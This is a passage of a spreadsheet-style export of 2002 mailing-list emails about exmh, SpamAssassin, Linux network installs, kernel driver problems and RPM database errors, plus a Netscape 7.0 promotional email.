    <t>Harlan Feinstein said:\n\n&gt; In particular, I was going to have a menu entry available for:\n&gt; o  remove the SA markup from a message\n&gt; o  add/remove addresses to whitelist\n&gt; Help!  :-)  I've never done customization of this type to my exmh install.\n&gt; I'm running version 2.4 (6/23/2000) on RedHat 7.3\n\nDespite being the author of SpamAssassin, I've never fixed exmh to do\nthis.  I am therefore clearly not an exmh hacker ;)\n\nBut to simplify -- the first action is piping the message to an external\ncommand, then replacing the message file with the output; and the second\nis simply piping the message to another command, then ignoring the output.\nI'd say it's easy enough to do, if someone can provide the tcl.\n\n--j.\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Marc Baaden &lt;baaden@smplinux.de&gt;\nDate: Tue, 06 Aug 2002 15:14:05 +0100</t>
  </si>
  <si>
    <t>Tue, 06 Aug 2002 15:14:05 +0100</t>
  </si>
  <si>
    <t>Marc Baaden &lt;baaden@smplinux.de&gt;</t>
  </si>
  <si>
    <t>Hi, sorry, but I am not very familiar with this sequence business and couldn't find an answer to my problem in the documentation. In fact, to be precise, it seems only to be the highlighting in the folder cache part and only for the inbox which does not work. Is there anything I could/should check ? Any file, .. ? Thanks, Marc &gt;&gt;&gt; Robert Elz said:  &gt;&gt;     Date:        Tue, 06 Aug 2002 09:04:58 +0100  &gt;&gt;     From:        Marc Baaden   &gt;&gt;     Message-ID:    &gt;&gt;   &gt;&gt;   | Any hints ?  &gt;&gt;   &gt;&gt; Probably a private sequence has gotten set, the highlighting only  &gt;&gt; works for public ones.  &gt;&gt;   &gt;&gt; If "scan unseen" works as you'd expect, but highlighting doesn't,  &gt;&gt; that's the usual explanation.  &gt;&gt;   &gt;&gt; kre  &gt;&gt;   &gt;&gt;   &gt;&gt;   &gt;&gt; _______________________________________________  &gt;&gt; Exmh-users mailing list  &gt;&gt; Exmh-users@redhat.com  &gt;&gt; [URL]https://listman.redhat.com[/URL]  &gt;&gt;  Marc Baaden --   Dr. Marc Baaden - Laboratory of Molecular Biophysics, Oxford University  mailto:baaden@smplinux.de  - ICQ# 11466242 -  [URL]http://www.marc-baaden.de[/URL]  FAX/Voice +49 697912 39550  -  Tel: +44 1865 275380  or  +33 609 843217 _______________________________________________ Exmh-users mailing list Exmh-users@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>https://listman.redhat.com http://www.marc-baaden.de https://listman.redhat.com</t>
  </si>
  <si>
    <t>To: SpamAssassin-talk@example.sourceforge.net\nFrom: yyyy@spamassassin.taint.org (Justin Mason)\nDate: Tue, 06 Aug 2002 15:06:27 +0100</t>
  </si>
  <si>
    <t>Tue, 06 Aug 2002 15:06:27 +0100</t>
  </si>
  <si>
    <t>[SAtalk] BIG CHANGE coming up in cvs</t>
  </si>
  <si>
    <t>CVS users: heads up! I think we've been talking about it long enough, so\nwe might as well check it in now.  It's about time to check in\n[URL]http://bugzilla.spamassassin.org[/URL]\n\nThis change will *remove* support for delivery to a local mailbox (ie the\ndefault mode of operation when "spamassassin" is run).\n\nIn addition, the "From " line will no longer be added to mails as a\nresult.\n\n--j.\n\n-- \n'Justin Mason' =&gt; { url =&gt; [URL]http://jmason.org[/URL] , blog =&gt; [URL]http://taint.org[/URL] }\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://bugzilla.spamassassin.org http://jmason.org http://taint.org http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: bryan roycroft &lt;bryanroycroft@yahoo.com.au&gt;\nFrom: Padraig Brady &lt;padraig.brady@corvil.com&gt;\nDate: Tue, 06 Aug 2002 15:00:16 +0100</t>
  </si>
  <si>
    <t>Tue, 06 Aug 2002 15:00:16 +0100</t>
  </si>
  <si>
    <t>bryan roycroft &lt;bryanroycroft@yahoo.com.au&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] ffs</t>
  </si>
  <si>
    <t>bryan roycroft wrote:\n&gt; has anyone got information on enabling ffs support in\n&gt; the kernel, i was looking around, and information on\n&gt; the subject seems to be sparse. \n\nIs this to mount an OS-X partition?\nThe following would be of interest in that case:\n[URL]http://marc.theaimsgroup.com[/URL]\n\nsummary is you should be able to mount FFS readonly,\nand the config item probably UFS:\n\n[padraig@pixelbeat ~]$ grep UFS /boot/config-2.4.18-3\nCONFIG_UFS_FS=m\n# CONFIG_UFS_FS_WRITE is not set\n\nSo `modprobe ufs` should work on a standard RH7.3 install?\n\nPdraig.\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://marc.theaimsgroup.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Albert White - SUN Ireland &lt;albert.white@ireland.sun.com&gt;\nDate: Tue, 06 Aug 2002 14:39:04 +0100</t>
  </si>
  <si>
    <t>Tue, 06 Aug 2002 14:39:04 +0100</t>
  </si>
  <si>
    <t>Albert White - SUN Ireland &lt;albert.white@ireland.sun.com&gt;</t>
  </si>
  <si>
    <t>Hi,\n\n&gt; has anyone got information on enabling ffs support in\n&gt; the kernel, i was looking around, and information on\n&gt; the subject seems to be sparse. \nI have no clue about ffs but...\n\nIn the 2.4 kernel source Documentation/Configure.help there are various kernel \noptions CONFIG_JFF* that enable it.\n\n[URL]http://developer.axis.com[/URL] and [URL]http://sources.redhat.com[/URL] \nare the URLs cited in that documentation. They have links to mailing lists and \narchives which may be able to answer more specific questions.\n\nIf you mean Amiga ffs, then thats selectable in the kernel config also :)\n\nCheers,\n~Al\n\n-- \nExpressed in this posting are my opinions.  They are in no way related\nto opinions held by my employer, Sun Microsystems.\nStatements on Sun products included here are not gospel and may\nbe fiction rather than truth.\n\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://developer.axis.com http://sources.redhat.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: Marc Perkel &lt;marc@perkel.com&gt;\nFrom: yyyy@spamassassin.taint.org (Justin Mason)\nDate: Tue, 06 Aug 2002 14:18:58 +0100</t>
  </si>
  <si>
    <t>Tue, 06 Aug 2002 14:18:58 +0100</t>
  </si>
  <si>
    <t>Re: [SAdev] Adding Scripting to Spam Assassin</t>
  </si>
  <si>
    <t>Marc -- \n\nSince perl itself is a scripting language, and allows code to be eval'ed,\nI can't see why we need to go the whole hog and implement another\nturing-complete scripting language in perl.\n\nLet's go back to *why* this would be useful.  As far as I can see, you're\nproposing this to deal with multi-match rules.  There's already a tracker\nin the bug DB for these, with a proposed implementation.\n\n  [URL]http://www.hughes-family.org[/URL]\n\nI think this might have stalled due to shortcomings in the existnig\nproposal, so I've just added my own thoughts on how to implement them. ;)\nComments on the proposed system would be welcome folks.... reply to the\nbug db.\n\n--j.\n\n-- \n'Justin Mason' =&gt; { url =&gt; [URL]http://jmason.org[/URL] , blog =&gt; [URL]http://taint.org[/URL] }\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-devel mailing list\nSpamassassin-devel@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://www.hughes-family.org http://jmason.org http://taint.org http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Albert White - SUN Ireland &lt;albert.white@ireland.sun.com&gt;\nDate: Tue, 06 Aug 2002 14:10:03 +0100</t>
  </si>
  <si>
    <t>Tue, 06 Aug 2002 14:10:03 +0100</t>
  </si>
  <si>
    <t>Hi, Matthew French: &gt; Declan Houlihan mentioned: &gt; &gt; We're actually investigating switching from Sparc/Solaris to &gt; &gt; Intel/Linux. Boo hisss *duck* :) &gt; Well, why not try Linux on Sparc.  &gt; &gt; And you get a working version of your favourite KDE/Gnome desktop instead of &gt; DTE, uhm, I mean CDE. um.. [URL]http://wwws.sun.com[/URL] integrated into solaris. Of course then there's [URL]http://wwws.sun.com[/URL] for  solaris 9 which gives you afterstep and windowmaker among other stuff. My  personal favourite at the moment is enlightenment which also has Solaris  packages available for download. &gt; &gt; Basically the whole installation procedure is &gt; &gt; "boot net - install" &gt; Talking of which, you can install Sparc Linux using this technique as well. &gt; The image takes a while to load, but once this is done you can install in &gt; the normal fashion. Out of curiosity, does `normal fashion` mean that you still have to do the  interactive customisations or is it like Solaris jumpstart where you can  specify everything on the install server, do `boot net - install` go home, and  come in to a fully installed and patched desktop the next morning? &gt; There are minor problems: like the serial console drivers, but for workstation  &gt; installs I suspect it will work fine. I don't see why this should be a _major problem. The prom (ie the "ok" prompt)  is almost at the hardware level and hence dosent depend on the os so you  should be able to connect to that easily enough. Once the machine is installed  cant you just log in over the network? The network is the computer after all  (sorry couldn't resist!) valen@tuatha.org said: &gt; side, Sun's terminal handling leaves a lot to be desired - it won't &gt; work properly on a Wyse 120+ for instance, no matter what emulation &gt; mode the Wyse is trying to do. hmm... I'm not familiar with wyse stuff, but I only need to use the console  when something breaks, then anything capable of something basic like vt100 at  9600 8n1 seems to work  . Not sure why you'd need to worry about this much  really, just set up jumpstart to install automatically then you don't need to  look at the console at all. Cheers, ~Al --  Expressed in this posting are my opinions.  They are in no way related to opinions held by my employer, Sun Microsystems. Statements on Sun products included here are not gospel and may be fiction rather than truth. --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://wwws.sun.com http://wwws.sun.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Niall Brady &lt;bradyn@maths.tcd.ie&gt;\nDate: Tue, 06 Aug 2002 14:04:11 +0100</t>
  </si>
  <si>
    <t>Tue, 06 Aug 2002 14:04:11 +0100</t>
  </si>
  <si>
    <t>On Tue, 06 Aug 2002 12:56:17 BST, kevin lyda said:\n&gt;\n&gt;sorry, i missed this.  redhat supplies something similar called kickstart\n&gt;(guess who inspired them?).  pc hardware is dumb, so you'll need to use\n&gt;a floppy.  otoh, every jumpstart config i've seen required rarp plus\n&gt;plugging the new box's ethernet+ip into a file.  a kickstart boot can\n&gt;just use a dhcp server.\n\nAye, but it'll still need a /boot/kickstart/$VER/$IP-kickstart won't it\nto proceed automatically?  [or am I completely off track there?]\n\n-- \n	Niall\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Albert White - SUN Ireland &lt;albert.white@ireland.sun.com&gt;\nFrom: Padraig Brady &lt;padraig.brady@corvil.com&gt;\nDate: Tue, 06 Aug 2002 13:52:39 +0100</t>
  </si>
  <si>
    <t>Tue, 06 Aug 2002 13:52:39 +0100</t>
  </si>
  <si>
    <t>Re: [ILUG] 3c509 &amp; 2.4.19 problems - SUMMARY</t>
  </si>
  <si>
    <t>Albert White - SUN Ireland wrote:\n&gt; Hi,\n&gt; \n&gt; Thanks for the replies. It turns out that it was an IRQ conflict with an old \n&gt; sound card.\n&gt; \n&gt; Despite checking the BIOS and running the 3c509 setup utility on \n&gt; [URL]http://www.scyld.com[/URL], the 2.4 kernel still picked a card on IRQ 5 and 10.\n&gt; \n&gt; It works fine now that the sound card is removed, but I'm still confused as to \n&gt; why this worked in 2.2.18 but not 2.4.19, seems like a regression to me...\n\nI'm jumping in here since I'm just back on\nILUG after quite a long break, anyway...\n\nAlan Cox was mentioning that he might have borked\nsome PNP stuff lately. You could try 2.4.19-ac4\nto see if it helps.\n\nPdraig.\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.scyld.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie, ilug@linux.ie\nFrom: Anders Holm &lt;anders.holm@elivefree.net&gt;\nDate: Tue, 06 Aug 2002 13:36:44 +0100</t>
  </si>
  <si>
    <t>Tue, 06 Aug 2002 13:36:44 +0100</t>
  </si>
  <si>
    <t>Anders Holm &lt;anders.holm@elivefree.net&gt;</t>
  </si>
  <si>
    <t>ilug@linux.ie, ilug@linux.ie</t>
  </si>
  <si>
    <t>At 13:30 06/08/2002, John P. Looney wrote:\n&gt;On Tue, Aug 06, 2002 at 01:22:07PM +0100, Anders Holm mentioned:\n&gt; &gt; &gt; Heh, how hard would it be to get a PC with an OpenBoot prom ?\n&gt; &gt;\n&gt; &gt; You could burn a PROM yourself, if you'd wish. I believe that the netboot\n&gt; &gt; project would have a PROM you could download and burn, having the needed\n&gt; &gt; h/w of course.. ;)\n&gt;\n&gt;  But the PROMs are for specific network cards, and all their are really is\n&gt;a bootp/tftp client. Not the whole set of nice bits &amp; pieces you get with\n&gt;an OpenBoot PROM.\n\nTrue, but would still enable you to do a network install without using boot \nfloppies. Then again, boot floppies are cheaper, and easier to recreate \nwhen you'd like to do some changes to it. Gets messier when you'd have a \nboot image on a server, and the only way you can test it is to boot it over \nthe network. In any case, it's just one option available.\n\n&gt;  AMD were talking of supporting it ages back, when the Athlon was looking\n&gt;like it would just be on workstations from day one. They seemed to drop\n&gt;it, and go for the crappy MSDOS compatible BIOS though.\n\nToo bad they didn't go with that then. Would have been so much nicer than \nthe old MSDOS crap. I do like the OpenBoot idea actually. Especially being \nable to set the PROM to boot from whatever disk slice you'd want. No need \nto set that in lilo/grub any more in that case, since the OpenBoot rom \ntakes care of that part for you. Then again, you wouldn't get a menu that \nallows you to choose what you want to boot. There's good and bad, all \ndepending on what you want to do, I suppose. Sitting here and typing I'm \nrealising that it is both a nice thing, and a nasty thing..\n\nAh well, life sucks as well, some say.. ;)\n\n//Anders//\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Albert White - SUN Ireland &lt;albert.white@ireland.sun.com&gt;\nDate: Tue, 06 Aug 2002 13:25:43 +0100</t>
  </si>
  <si>
    <t>Tue, 06 Aug 2002 13:25:43 +0100</t>
  </si>
  <si>
    <t>Hi,\n\nThanks for the replies. It turns out that it was an IRQ conflict with an old \nsound card.\n\nDespite checking the BIOS and running the 3c509 setup utility on \n[URL]http://www.scyld.com[/URL], the 2.4 kernel still picked a card on IRQ 5 and 10.\n\nIt works fine now that the sound card is removed, but I'm still confused as to \nwhy this worked in 2.2.18 but not 2.4.19, seems like a regression to me...\n\nThanks again,\n\nCheers,\n~Al\n\nOriginal question:\n&gt; Hi folks,\n&gt; \n&gt; I decided to upgrade the kernel on a machine at home from 2.2.18pre21 to the latest from kernel.org which is 2.4.19.\n&gt; \n&gt; However I have encountered one problem, my network card now dosent work, well kind of dosent work...\n&gt; \n&gt; Instead of one eth0 on IRQ 10 I now get:\n&gt; Aug  4 11:31:51 mira kernel: eth0: 3c5x9 at 0x220, 10baseT port, address  00 10 5a 3e 0e 48, IRQ 5.\n&gt; Aug  4 11:31:51 mira kernel: 3c509.c:1.18 12Mar2001 becker@scyld.com\n&gt; Aug  4 11:31:51 mira kernel: [URL]http://www.scyld.com[/URL]\n&gt; Aug  4 11:31:51 mira kernel: eth1: 3c5x9 at 0x300, 10baseT port, address  00 10 5a be 0e 48, IRQ 10.\n&gt; Aug  4 11:31:51 mira kernel: 3c509.c:1.18 12Mar2001 becker@scyld.com\n&gt; Aug  4 11:31:51 mira kernel: [URL]http://www.scyld.com[/URL]\n&gt; \n&gt; This results in the interface(s) coming up but while packets can go out they can not come in.\n&gt; \n&gt; I've tried not loading the 3c509 mdule on bootup and then `modload 3c509 IRQ=10` bit it still gets loaded as above, on IRQ 5 and 10. On 2.2 it loads to IRQ 10.\n&gt; \n&gt; Anyone got any suggestions on what to do here? Its a debian 3.0 distro. This works fine when booted to 2.2 so the hardware/BIOS etc seem ok, so it seems to be 2.4 spacific. Have I missed some kernel setting?\n&gt; \n&gt; Cheers,\n&gt; ~Al\n\n-- \nExpressed in this posting are my opinions.  They are in no way related\nto opinions held by my employer, Sun Microsystems.\nStatements on Sun products included here are not gospel and may\nbe fiction rather than truth.\n\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.scyld.com http://www.scyld.com http://www.scyld.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie, ilug@linux.ie\nFrom: Anders Holm &lt;anders.holm@elivefree.net&gt;\nDate: Tue, 06 Aug 2002 13:22:07 +0100</t>
  </si>
  <si>
    <t>Tue, 06 Aug 2002 13:22:07 +0100</t>
  </si>
  <si>
    <t>At 13:06 06/08/2002, John P. Looney wrote:\n&gt;[snip]\n&gt;  There is a nice need 'add_install_client' script that you feed the\n&gt;archtecture, ethernet address &amp; ip to, and it'll setup everything from\n&gt;RARP to Bootparams for you. Very simple.\n\nYep, very handy and easy enough.\n\n&gt;  This script takes a -d option, to boot via DHCP also. On the negative\n&gt;side, Sun's terminal handling leaves a lot to be desired - it won't work\n&gt;properly on a Wyse 120+ for instance, no matter what emulation mode the\n&gt;Wyse is trying to do.\n\nTrue, SUN's terminal handling isn't the best in the world.\n\n&gt;  To do PC netbooting properly, you need an motherbard with a PXE BIOS.\n&gt;Then you are flying.\n\nOR a network card with a BootRom installed, and BIOS support to boot of the \nnetwork.\n\n&gt;  Heh, how hard would it be to get a PC with an OpenBoot prom ?\n\nYou could burn a PROM yourself, if you'd wish. I believe that the netboot \nproject would have a PROM you could download and burn, having the needed \nh/w of course.. ;)\n\n//Anders//\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Dave Long &lt;dl@silcom.com&gt;\nDate: Tue, 06 Aug 2002 11:30:10 -0700</t>
  </si>
  <si>
    <t>Tue, 06 Aug 2002 11:30:10 -0700</t>
  </si>
  <si>
    <t>S&amp;P QC</t>
  </si>
  <si>
    <t>Begeman's _Manufacturing Processes_\ntalks about Quality Control Charts:\n\n&gt; The tolerance limits for a part are placed outside of the control\n&gt; limits and are never inside of them.  Once the control chart has\n&gt; been established, data is recorded on it and it becomes a record\n&gt; of the variation of an inspected dimension over a period of time.\n&gt; The data plotted should fall in random fashion between the control\n&gt; lines, if all assignable causes for variation are absent.  When the\n&gt; data fall in this manner, it can be assumed that the part is being\n&gt; made correctly 99.73% of the time; that is, no more than 3 out of\n&gt; 1000 will leave the process incorrectly made.\n\nTaking a look at the S&amp;P 500, and \nusing the Ibbotson 2000 figures of\n13% expected stock return and 20%\nstandard deviation, and taking the\nthe actual 2.5 year return on the\nS&amp;P since 31 Dec 1999 to be close\nto -30%, we find:\n\n-.30 ? 2.5*(.13) - 3*sqrt(2.5)*(.20)\n-30% &gt; -60%\n\nso it still plots out between the\ncontrol lines ...\n\n&gt; So long as the points fall between the control lines, no adjustments\n&gt; or changes in the process are necessary.  If five to seven points fall\n&gt; on one side of the mean, the process should be checked.  When points\n&gt; fall outside of the control lines, the cause must be located and\n&gt; corrected immediately.\n\n... but maybe we should've checked\nthe process during the "long" bull.\n\n-Dave\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Harlan Feinstein &lt;harlan@feinsteins.net&gt;\nDate: Tue, 06 Aug 2002 09:29:06 -0400</t>
  </si>
  <si>
    <t>Tue, 06 Aug 2002 09:29:06 -0400</t>
  </si>
  <si>
    <t>Harlan Feinstein &lt;harlan@feinsteins.net&gt;</t>
  </si>
  <si>
    <t>integrating a couple spamassassin actions into the More... menu</t>
  </si>
  <si>
    <t>I'm positive some of you folks have done this, so perhaps someone can just\ndrop me a pointer to where it's already been discussed?\n\nIn particular, I was going to have a menu entry available for:\n\no  remove the SA markup from a message\no  add/remove addresses to whitelist\n\nHelp!  :-)  I've never done customization of this type to my exmh install.\nI'm running version 2.4 (6/23/2000) on RedHat 7.3\n\n--Harlan\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Marc Baaden &lt;baaden@smplinux.de&gt;\nDate: Tue, 06 Aug 2002 09:04:58 +0100</t>
  </si>
  <si>
    <t>Tue, 06 Aug 2002 09:04:58 +0100</t>
  </si>
  <si>
    <t>inbox mail notification broken</t>
  </si>
  <si>
    <t>Hi,\n\nI am experiencing a strange problem since a couple of days now,\nI have several folders with unseen sequences, and when there is\nnew mail they are highlighted. This works fine.\n\nBut .. since a couple of days the actual inbox won't be highlighted\nany more when there is new mail. On the other hand the unseen window\nstill indicates if there is new mail in the inbox.\n\nAll other folders seem to work properly.\n\nAny hints ?\n\n  Marc Baaden\n\n-- \n Dr. Marc Baaden - Laboratory of Molecular Biophysics, Oxford University\n mailto:baaden@smplinux.de  - ICQ# 11466242 -  [URL]http://www.marc-baaden.de[/URL]\n FAX/Voice +49 697912 39550  -  Tel: +44 1865 275380  or  +33 609 843217\n\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>http://www.marc-baaden.de https://listman.redhat.com</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: J C Lawrence &lt;claw@kanga.nu&gt;\nDate: Tue, 06 Aug 2002 00:25:19 -0700</t>
  </si>
  <si>
    <t>Tue, 06 Aug 2002 00:25:19 -0700</t>
  </si>
  <si>
    <t>On Mon, 05 Aug 2002 21:39:59 -0400  Tom Reingold  wrote: &gt; Years ago, there was a package called mh-e which was an emacs &gt; interface to MH.  I don't know if it's still around or works.  But &gt; it's an idea. Its still around, its actively maintained, and its quite well evolved. --  J C Lawrence                 ---------(*)                Satan, oscillate my metallic sonatas.  claw@kanga.nu               He lived as a devil, eh?		   [URL]http://www.kanga.nu[/URL]  Evil is a name of a foeman, as I live. _______________________________________________ Exmh-users mailing list Exmh-users@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Mark Derricutt &lt;mark@talios.com&gt;\nDate: Tue, 05 Feb 2002 21:41:08 +1300</t>
  </si>
  <si>
    <t>Tue, 05 Feb 2002 21:41:08 +1300</t>
  </si>
  <si>
    <t>Problem with an rpm...</t>
  </si>
  <si>
    <t>Hiya, I just myself an rpm, and when I did -Uvh to upgrade the earlier  version I had installed (also from my rpm) I got: [root@spawn i386]# rpm -Uvh mulberry-2.2-b1.i386.rpm Preparing...                ###########################################  [100%]    1:mulberry               ###########################################  [100%] error: db3 error(-30998) from db-&gt;close: DB_INCOMPLETE: Cache flush was  unable to complete Whats the DB_INCOMPLETE mean? It all seems to have installed ok thou...                                     -- \m/ --   "...if I seem super human I have been misunderstood." (c) Dream Theater          mark@talios.com - ICQ: 1934853 JID: talios@myjabber.net _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Roy-Magne Mo &lt;rmo@sunnmore.net&gt;\nDate: Tue, 05 Feb 2002 20:21:25 +0100</t>
  </si>
  <si>
    <t>Tue, 05 Feb 2002 20:21:25 +0100</t>
  </si>
  <si>
    <t>Mark Derricutt wrote: &gt; Never mind, there was some cron thing doing rpm -qf ???  seems fine now. &gt;  &gt; --On Wednesday, February 06, 2002 07:37:44 +1300 Mark Derricutt  &gt;  wrote: &gt;  &gt;&gt; Fetched 88.1kB in 2m31s (581B/s) &gt;&gt; error: cannot get exclusive lock on /var/lib/rpm/Packages &gt;&gt; error: cannot open Packages index using db3 - Operation not permitted (1) &gt;&gt; E: could not open RPM database:cannot open Packages index using db3 - &gt;&gt; Operation not permitted (1) You can do a rpm --rebuilddb too _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Roy-Magne Mo &lt;rmo@sunnmore.net&gt;\nDate: Tue, 05 Feb 2002 15:06:28 +0100</t>
  </si>
  <si>
    <t>Tue, 05 Feb 2002 15:06:28 +0100</t>
  </si>
  <si>
    <t>Mark Derricutt wrote: &gt; Hiya, I just myself an rpm, and when I did -Uvh to upgrade the earlier  &gt; version I had installed (also from my rpm) I got: &gt;  &gt; [root@spawn i386]# rpm -Uvh mulberry-2.2-b1.i386.rpm &gt; Preparing...                ###########################################  &gt; [100%] &gt;   1:mulberry               ###########################################  &gt; [100%] &gt; error: db3 error(-30998) from db-&gt;close: DB_INCOMPLETE: Cache flush was  &gt; unable to complete It's not the rpm, it's the rpm-system with you. The cache seems to have  rottened. Try removing /var/lib/rpm/__db* _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: ler@lerami.lerctr.org\nFrom: Netscape &lt;Netscape@dms.netscape.com&gt;\nDate: Tue, 03 Sep 2002 13:04:31 -0800</t>
  </si>
  <si>
    <t>Tue, 03 Sep 2002 13:04:31 -0800</t>
  </si>
  <si>
    <t>Netscape &lt;Netscape@dms.netscape.com&gt;</t>
  </si>
  <si>
    <t>ler@lerami.lerctr.org</t>
  </si>
  <si>
    <t>Announcing the New Netscape 7.0 - The Fastest Netscape Browser Ever</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. --______BoundaryOfDocument______ Content-Type: text/plain Content-Transfer-Encoding: 7bit Netscape Valued Customer: Announcing the NEW Netscape 7.0 Browser! Download it now for FREE! For more information and to download now, click here: [URL]http://dms-www01.netcenter.com[/URL] Get Netscape 7.0 - the Fastest Netscape Browser Ever! It's easier than ever to upgrade to Netscape 7.0, and keep your bookmarks and browser settings. Upgrade to the NEW Netscape 7.0, and get the most from your time on-line. And Netscape 7.0 is also available on CD for FREE! Click here to order the CD and Guidebook: [URL]http://dms-www01.netcenter.com[/URL] The Netscape Browser Team -----------------------------------------------------------  Netscape respects your online time and Internet privacy.  If you would prefer not to receive future email messages  from Netscape Netbusiness, please click on the following  link or simply reply to this email and type "REMOVE" in the  subject line.  PLEASE NOTE: DO NOT CLICK ON THE LINK UNLESS YOU  WANT TO UNSUBSCRIBE.  [URL]http://dms-www01.netcenter.com[/URL]  You are subscribed with:[ler@lerami.lerctr.org] (c) 2002 Netscape. All Rights Reserved. Privacy Policy, Terms  of Service. [URL]http://channels.netscape.com[/URL] --______BoundaryOfDocument______ Content-Type: text/html Content-Transfer-Encoding: 7bit Netscape 7.0 Announcing the NEW Netscape 7.0 Browser! Download it now for  FREE! Get Netscape 7.0 - 		the Fastest NetscapeBrowser Ever! It's easier than ever to upgrade to Netscape 7.0, 		and keep your bookmarks and browser settings. 		Upgrade to the NEW Netscape 7.0, and get the 		most from your time on-line. To Unsubscribe, click here and follow the instructions on the following page 	- or simply reply to this e-mail and type "REMOVE" in the subject line. 	Â© 2002 Netscape, All Rights Reserved. Legal &amp; Privacy Notices --______BoundaryOfDocument______-- : annmn:[041LoE041LoE51b9er012000W2TBvFJ]</t>
  </si>
  <si>
    <t>http://dms-www01.netcenter.com http://dms-www01.netcenter.com http://dms-www01.netcenter.com http://channels.netscape.com</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: Arnaud Abelard &lt;arnaud.abelard@sciences.univ-nantes.fr&gt;\nDate: Tue, 03 Sep 2002 08:39:57 +0200</t>
  </si>
  <si>
    <t>Tue, 03 Sep 2002 08:39:57 +0200</t>
  </si>
  <si>
    <t>Arnaud Abelard &lt;arnaud.abelard@sciences.univ-nantes.fr&gt;</t>
  </si>
  <si>
    <t>[Razor-users] razor plugins for mozilla?</t>
  </si>
  <si>
    <t>Hello,\n\ndid any of you hear about a a razor plugin for mozilla?\na plugin that would add a "report as spam" button somewhere for the user \nto report a mail as spam on a server?\n\nArnaud\n-- \nArnaud Ablard\nAdministrateur rseaux et systmes\nIrin / Facult de Sciences\nUniversit de Nantes\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old\ncell phone?  Get a new here for FREE!\n[URL]https://www.inphonic.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: "Lance" &lt;lance_tt@bellsouth.net&gt;\nFrom: "" Angles " Puglisi" &lt;angles@aminvestments.com&gt;\nDate: Tue, 03 Sep 2002 07:21:19 +0000</t>
  </si>
  <si>
    <t>Tue, 03 Sep 2002 07:21:19 +0000</t>
  </si>
  <si>
    <t>"Lance" &lt;lance_tt@bellsouth.net&gt;</t>
  </si>
  <si>
    <t>Re: thanks for the gamix source rpms! [ALSA stuff]</t>
  </si>
  <si>
